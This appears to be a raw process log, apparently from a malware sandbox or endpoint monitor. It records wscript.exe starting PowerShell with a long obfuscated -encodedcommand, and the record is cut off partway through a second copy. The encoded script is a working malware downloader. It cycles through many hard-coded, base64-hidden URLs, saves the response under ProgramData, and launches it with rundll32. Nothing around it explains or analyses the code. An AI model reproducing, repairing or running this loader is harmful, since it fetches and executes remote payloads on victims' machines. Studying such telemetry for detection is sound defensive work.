EIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHAHcAQQBlAFEAQgBFAEEARwBrAEEAYQBBAEIANQBBAEcAUQBBAGMAZwBCAHYAQQBIAGcAQQBlAFEAQgBoAEEARwBNAEEAWgBRAEIAMABBAEcAOABBAGIAZwBCAGwAQQBDADQAQQBaAGcAQgBoAEEASABJAEEAYgBRAEEAPQBsAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQAyAEEAQwA0AEEATQBRAEEANQBBAEQASQBBAGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEANABBAEQASQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABZAEEATwBBAEEAPQAiADsAJABDAHkAdABvAGcAZQBuAGUAdABpAGMAUABvAGUAdABpAHoAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAQQBCAGgAQQBHAGsAQQBkAEEAQgBvAEEARwBVAEEAYwB3AEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBAEkAZQBQAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQB3AEEAdQBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQAxAEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AZwBBAD0AIgA7ACQAVABpAG4AZwBlAG4AdABVAHAAZABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE4AUQBBAHUAQQBEAFUAQQBPAFEAQQB1AEEARABJAEEATQBnAEEAdwBBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAHcAQgBTAEEASABZAEEATAB3AEIAVABBAEYASQBBAE4AdwBCAEkAQQBBAD0APQBRAGkAcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAGMAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE4AdwBBADQAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATAB3AEIANgBBAEUAWQBBAGEAdwBCADUAQQBDADgAQQBkAEEAQgBhAEEARQBjAEEATQB3AEEAMABBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE4AZwBBADQAQQBDADgAQQBPAFEAQgBEAEEARwAwAEEATwBRAEIARgBBAEYAYwBBAEwAdwBCAEwAQQBIAGMAQQBVAHcAQgA2AEEARwBNAEEAYQBBAEIAMwBBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE8AUQBBAHkAQQBDADgAQQBTAGcAQgBVAEEARwBrAEEATAB3AEIAeABBAEYAVQBBAGQAUQBCAFQAQQBIAE0AQQBZAFEAQgBYAEEAQQA9AD0AUQBpAHIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgATQBBAFUAQQBCAGkAQQBHAHMAQQBiAGcAQgBzAEEARQBRAEEATwBRAEIAdQBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAcgBiAGkAYwBvAGwAYQBlAEcAZQBuAGUAdABoAGwAaQBhAGMAaQBzAG0AIABpAG4AIAAkAFQAaQBuAGcAZQBuAHQAVQBwAGQAYQB0AGUAIAAtAHMAcABsAGkAdAAgACIAUQBpAHIAIgApACAAewAkAGMAaABlAG4AaQBlAHIAUwB3AGkAbgBnAGwAZQB0AGEAaQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAZABBAEIAcABBAEcANABBAFoAdwBCAGgAQQBIAEkAQQBaAFEAQgBsAEEARwBrAEEAYgBnAEIAbgBBAEUAdwBBAFkAUQBCAG4AQQBHADgAQQBiAFEAQgB2AEEASABJAEEAYwBBAEIAbwBBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AVwB1AFcATABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAHcAQQBhAFEAQgB3AEEARwBRAEEAWQBRAEIAagBBAEcAZwBBAGMAdwBBAHUAQQBHAEUAQQBiAFEAQQA9AFcAdQBXAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBRAEEAdQBBAEQAVQBBAE8AUQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATgBRAEEANABBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJABnAHIAbwB1AG4AZABzAGsAZQBlAHAAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBADEAQQBEAEEAQQBMAGcAQQA1AEEARABnAEEAaQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAGoAQQBIAEkAQQBiAHcAQgB2AEEARwA0AEEAVAB3AEIAMgBBAEcAVQBBAGMAZwBCADAAQQBHAEUAQQBhAHcAQgBsAEEASABJAEEATABnAEIAbQBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQAiADsAJABIAGUAbABsAGUAYgBvAHIAaQBuAGUASABhAGkAcgBzAHQAcgBlAGEAawAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABVAHIAYgBpAGMAbwBsAGEAZQBHAGUAbgBlAHQAaABsAGkAYQBjAGkAcwBtACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQASABlAGwAbABlAGIAbwByAGkAbgBlAEgAYQBpAHIAcwB0AHIAZQBhAGsAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwATQBpAHQAaQBnAGEAdABpAG8AbgBUAHIAaQBtAG0AaQBuAGcAbAB5AC4AYwBsAGEAdQBzAGUAcwA7ACQAYgBhAHMAawBlAHQAdwBvAHIAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAMwBBAEQAWQBBAEwAZwBBAHkAQQBEAFEAQQBNAGcAQQA9ACIAOwAkAEUAcwBjAGEAbABsAG8AcABzAE8AdgBlAHIAYQBzAHMAdQBtAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB6AEEARABFAEEATABnAEEAMQBBAEQASQBBAGcAdwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBkAEEAQgBwAEEASABNAEEAWQBRAEIAMgBBAEcARQBBAFoAdwBCAGwAQQBFAGcAQQBaAFEAQgBoAEEARwBRAEEAYwB3AEIAbwBBAEcARQBBAGEAdwBCAGwAQQBIAEkAQQBMAGcAQgBqAEEASABJAEEAWgBRAEIAawBBAEcAawBBAGQAQQBBAD0AIgA7ACQAdABoAGUAcgBzAGkAdABlAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9AEQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwA0AEEAWgBRAEIAMQBBAEgASQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBzAEEARwBrAEEAYgBnAEIAcgBBAEEAPQA9AEQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBRAEEAMQBBAEMANABBAE0AUQBBADMAQQBEAGcAQQBMAGcAQQB4AEEARABJAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADAAQQBBAD0APQBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAeABBAEgAVQBBAFkAUQBCAHoAQQBHAGsAQQBjAEEAQgBsAEEASABJAEEAYQBRAEIAdgBBAEcAUQBBAGEAUQBCAGoAQQBFAHcAQQBhAFEAQgAwAEEARwBVAEEAYwBnAEIAaABBAEgAUQBBAFoAUQBCAHMAQQBIAGsAQQBMAGcAQgBpAEEARwA4AEEAZABRAEIAMABBAEcAawBBAGMAUQBCADEAQQBHAFUAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGkAdABpAGcAYQB0AGkAbwBuAFQAcgBpAG0AbQBpAG4AZwBsAHkALgBjAGwAYQB1AHMAZQBzACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA5ADkANwAxADIAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBFADAAQQBhAFEAQgAwAEEARwBrAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBWAEEAQgB5AEEARwBrAEEAYgBRAEIAdABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAYgBBAEIAaABBAEgAVQBBAGMAdwBCAGwAQQBIAE0AQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAFQAUQBCAEoAQQBGAFEAQQBUAEEAQgBwAEEARwBNAEEAWgBRAEIAdQBBAEgATQBBAFoAUQBBAD0AIgA7ACQAYwBhAGwAbwBtAGUAbABzAEIAZQBuAHoAbwBwAHkAcgBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAGMAQQBMAGcAQQB4AEEARABNAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADUAQQBDADQAQQBPAEEAQQAzAEEAQQA9AD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADIAQQBDADQAQQBNAFEAQQB6AEEARABJAEEAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAMgBBAEMANABBAE0AUQBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAWQBBAEwAZwBBAHgAQQBEAEkAQQBOAFEAQQB1AEEARABFAEEATQBBAEEAMQBBAEEAPQA9ACIAOwAkAHMAYQB0AHUAcgBhAHQAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATABnAEEAeABBAEQATQBBAE4AQQBBAD0AIgA7ACQASgBlAG8AcABhAHIAZABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAHcAQgB3AEEARwB3AEEAWgBRAEIAdQBBAEcAawBBAGIAdwBCAHAAQQBHAFEAQQBUAEEAQgBoAEEASABBAEEAYwB3AEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9AFQAZgBKAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATQBBAEEAdQBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBOAGcAQQAzAEEAQwA0AEEATQBnAEEAeABBAEQATQBBACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAbgBvAG4AZQB4AHQAZQBuAHMAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBiAHcAQgB5AEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEcAQQBIAEkAQQBkAFEAQgBuAEEARwBFAEEAYgBBAEIAcABBAEgATQBBAGQAQQBBAHUAQQBIAE0AQQBhAEEAQgB2AEEARwBVAEEAYwB3AEEAPQBMAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEANABBAEMANABBAE0AUQBBAHcAQQBEAFkAQQBMAGcAQQAwAEEARABRAEEATABnAEEAeQBBAEQATQBBAE4AUQBBAD0ATABCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEcAOABBAGMAdwBCAHoAQQBHAGsAQQBaAFEAQgBUAEEASABVAEEAWQBnAEIAaQBBAEcARQBBAGMAdwBCAHoAQQBDADQAQQBhAEEAQgB2AEEARwBNAEEAYQB3AEIAbABBAEgAawBBACIAOwB9AH0AJABwAGUAcgBqAHUAcgBlAGQAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEANQBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeQBBAEQAQQBBAE4AUQBBAD0AcABjAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATwBBAEEAdQBBAEQASQBBAE4AQQBBADUAQQBDADQAQQBNAFEAQQB4AEEARABjAEEATABnAEEAMABBAEQAQQBBAHAAYwBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCADAAQQBHAGcAQQBlAFEAQgBzAEEARwBVAEEAYgBnAEIAbABBAEYAVQBBAGIAZwBCAHcAQQBHAHcAQQBkAFEAQgBuAEEASABNAEEATABnAEIAcgBBAEcAawBBAGIAUQBBAD0AIgA7ACQAVQBuAGsAaQBsAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABNAEEATABnAEEAeABBAEQASQBBAE0AdwBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABJAEEATQBRAEEAMQBBAEEAPQA9AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE4AdwBBADQAQQBBAD0APQAiADsAJABIAG8AdABwAHIAZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB5AEEAQwA0AEEATgBnAEEANABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQBMAGcAQQAzAEEARABjAEEAIgA7AA=="
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABQAHIAZQBzAGEAYwByAGEAbABEAHIAYQBnAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAQQBBAEwAZwBBADUAQQBEAE0AQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAD0AbABkAHcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABNAEEATABnAEEAeQBBAEQAQQBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB5AEEAQwA0AEEATgBBAEEAeQBBAEEAPQA9AGwAZAB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEAMgBBAEQAWQBBAEwAZwBBADQAQQBEAFkAQQAiADsAJABtAGUAdABhAGwAbABpAGsAZQBMAG8AZwBsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQA4AEEAZABnAEIAbABBAEgASQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEARwBVAEEAYwBnAEIARQBBAEcAawBBAFkAUQBCAG4AQQBIAEkAQQBZAFEAQgB0AEEARwAwAEEAWQBRAEIAMABBAEcAawBBAFkAdwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARwBJAEEAZABRAEIANgBBAEgAbwBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEMAQQBHAFUAQQBZAFEAQgAyAEEARwBVAEEAYwBnAEIAbABBAEcAUQBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9AHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBZAFEAQgBwAEEARwB3AEEAWQBnAEIAdgBBAEcARQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQB1AEEARwBNAEEAWQBRAEIAbQBBAEcAVQBBAHYAagBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGsAQQBMAGcAQQAzAEEARABVAEEATABnAEEAeQBBAEQASQBBAE4AdwBBAHUAQQBEAFkAQQBOAFEAQQA9ACIAOwAkAGIAZQB0AGkAcgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAcwBBAEcATQBBAFkAUQBCADAAQQBHAFUAQQBWAEEAQgAzAEEASABrAEEAWgBRAEIAeQBBAEgATQBBAEwAZwBCAHAAQQBHADgAQQBQAGoAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHgAQQBIAFUAQQBZAFEAQgBrAEEASABJAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAHcAQQBiAHcAQgAxAEEASABNAEEAVQBBAEIAdgBBAEcAdwBBAGIAQQBCADEAQQBIAFEAQQBaAFEAQgB6AEEAQwA0AEEAZABnAEIAcABBAEgAQQBBAFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADAAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEAMgBBAEQASQBBAEwAZwBBAHgAQQBEAGcAQQBOAEEAQQA9AFAAagBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADEAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQQA9AD0AIgA7ACQAaAB5AHAAbwBpAG4AbwBzAGUAbQBpAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBjAHcAQgB6AEEARwBJAEEAWgBRAEIAeQBBAEgASQBBAGUAUQBCAFMAQQBIAFUAQQBiAFEAQgBpAEEASABVAEEAYwB3AEIAMABBAEcAawBBAGIAdwBCAHUAQQBDADQAQQBiAFEAQgB2AEEARwA0AEEAWgBRAEIANQBBAEEAPQA9AGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHAHcAQQBlAFEAQgBFAEEARwBrAEEAYQBBAEIANQBBAEcAUQBBAGMAZwBCAHYAQQBIAGcAQQBlAFEAQgBoAEEARwBNAEEAWgBRAEIAMABBAEcAOABBAGIAZwBCAGwAQQBDADQAQQBaAGcAQgBoAEEASABJAEEAYgBRAEEAPQBsAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQAyAEEAQwA0AEEATQBRAEEANQBBAEQASQBBAGwARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEANABBAEQASQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABZAEEATwBBAEEAPQAiADsAJABDAHkAdABvAGcAZQBuAGUAdABpAGMAUABvAGUAdABpAHoAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAQQBCAGgAQQBHAGsAQQBkAEEAQgBvAEEARwBVAEEAYwB3AEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBAEkAZQBQAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQB3AEEAdQBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQAxAEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AZwBBAD0AIgA7ACQAVABpAG4AZwBlAG4AdABVAHAAZABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE4AUQBBAHUAQQBEAFUAQQBPAFEAQQB1AEEARABJAEEATQBnAEEAdwBBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAHcAQgBTAEEASABZAEEATAB3AEIAVABBAEYASQBBAE4AdwBCAEkAQQBBAD0APQBRAGkAcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAGMAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE4AdwBBADQAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATAB3AEIANgBBAEUAWQBBAGEAdwBCADUAQQBDADgAQQBkAEEAQgBhAEEARQBjAEEATQB3AEEAMABBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE4AZwBBADQAQQBDADgAQQBPAFEAQgBEAEEARwAwAEEATwBRAEIARgBBAEYAYwBBAEwAdwBCAEwAQQBIAGMAQQBVAHcAQgA2AEEARwBNAEEAYQBBAEIAMwBBAEEAPQA9AFEAaQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEMANABBAE8AUQBBAHkAQQBDADgAQQBTAGcAQgBVAEEARwBrAEEATAB3AEIAeABBAEYAVQBBAGQAUQBCAFQAQQBIAE0AQQBZAFEAQgBYAEEAQQA9AD0AUQBpAHIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgATQBBAFUAQQBCAGkAQQBHAHMAQQBiAGcAQgBzAEEARQBRAEEATwBRAEIAdQBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFUAcgBiAGkAYwBvAGwAYQBlAEcAZQBuAGUAdABoAGwAaQBhAGMAaQBzAG0AIABpAG4AIAAkAFQAaQBuAGcAZQBuAHQAVQBwAGQAYQB0AGUAIAAtAHMAcABsAGkAdAAgACIAUQBpAHIAIgApACAAewAkAGMAaABlAG4AaQBlAHIAUwB3AGkAbgBnAGwAZQB0AGEAaQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAZABBAEIAcABBAEcANABBAFoAdwBCAGgAQQBIAEkAQQBaAFEAQgBsAEEARwBrAEEAYgBnAEIAbgBBAEUAdwBBAFkAUQBCAG4AQQBHADgAQQBiAFEAQgB2AEEASABJAEEAYwBBAEIAbwBBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AVwB1AFcATABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAHcAQQBhAFEAQgB3AEEARwBRAEEAWQBRAEIAagBBAEcAZwBBAGMAdwBBAHUAQQBHAEUAQQBiAFEAQQA9AFcAdQBXAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBRAEEAdQBBAEQAVQBBAE8AUQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATgBRAEEANABBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJABnAHIAbwB1AG4AZABzAGsAZQBlAHAAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBADEAQQBEAEEAQQBMAGcAQQA1AEEARABnAEEAaQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAGoAQQBIAEkAQQBiAHcAQgB2AEEARwA0AEEAVAB3AEIAMgBBAEcAVQBBAGMAZwBCADAAQQBHAEUAQQBhAHcAQgBsAEEASABJAEEATABnAEIAbQBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQAiADsAJABIAGUAbABsAGUAYgBvAHIAaQBuAGUASABhAGkAcgBzAHQAcgBlAGEAawAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBv